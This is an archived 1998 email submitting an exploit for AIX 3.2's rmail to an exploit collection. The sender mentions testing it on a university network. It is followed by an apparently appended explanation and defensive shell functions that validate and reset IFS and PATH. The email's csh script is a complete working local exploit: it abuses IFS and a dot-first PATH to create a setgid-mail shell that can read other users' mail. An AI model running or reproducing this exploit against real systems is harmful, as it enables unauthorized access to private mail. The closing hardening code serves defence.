
AIX 3.2 rmail hole



Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
To: fyodor@dhp.com
Subject: AIX oldie

hi fyodor,

first let me tell you that your pages are great - but you already
know that, don't you?

i noticed you have an exploit section sorted by os; here's an oldie
but goodie for AIX boxes running 3.2, the exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
i successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)

i guess you probably know of this ancient IFS hole; just in case you
wanted to include it in your pages ...

cya & keep up the marvelous work,

[cut]

-----------snip------------
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail.
# Setup needed files.

mkdir /tmp/.rmail
cd /tmp/.rmail

cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .

# Set PATH, IFS, and run rmail.

setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
-----------snip------------
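The two ingredients the script above relies on are an inherited IFS (so the shell splits a path like /usr/bin/rmail into the words usr, bin, rmail and resolves the first one along PATH) and a PATH whose first entry is the current directory. The following POSIX sh functions are an added illustration, not part of the original mail or of AIX: they show the splitting effect on an unprivileged shell and the check-and-reset a setuid/setgid wrapper script should perform before running anything. Function and variable names are my own.

```shell
#!/bin/sh
# Added example (constructed, not from the original post). Runs in any POSIX sh.

_nl='
'
_default_ifs=" $(printf '\t')$_nl"   # space, tab, newline: the shell's default IFS

# Print the words an unquoted expansion of path $2 produces when IFS is $1.
# With IFS=/ the path "/usr/bin/rmail" becomes "usr bin rmail"; the first word,
# "usr", is then looked up along PATH instead of being treated as a directory.
words_under_ifs() {
    _saved_ifs=${IFS-$_default_ifs}
    IFS=$1
    set -- $2
    IFS=$_saved_ifs
    echo $*
}

# True (exit 0) when the default IFS is in effect; any other value means a caller
# has changed how this shell splits words.
ifs_is_default() {
    [ "$1" = "$_default_ifs" ]
}

# True (exit 0) when the PATH-style list $1 has an entry that is not absolute:
# ".", an empty component (leading, trailing or doubled colon) or a bare name.
# All of these make the shell search the current directory.
path_has_relative_entry() {
    case ":$1:" in *::*|*:.:*) return 0 ;; esac
    _p=$1
    while [ -n "$_p" ]; do
        _comp=${_p%%:*}
        case $_comp in /*) ;; *) return 0 ;; esac
        case $_p in *:*) _p=${_p#*:} ;; *) _p= ;; esac
    done
    return 1
}

# Combined check on the calling environment.
env_is_sane() {
    ifs_is_default "${IFS-$_default_ifs}" && ! path_has_relative_entry "$PATH"
}

# Hardened pattern: a script that runs with a privileged uid/gid resets the
# variables its caller controls as its very first action.
reset_env() {
    IFS=$_default_ifs
    PATH=/usr/bin:/bin
    export IFS PATH
}
```

Put `reset_env` at the top of any privileged script; `env_is_sane` is useful as an assertion in tests or as a guard before a helper is invoked.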


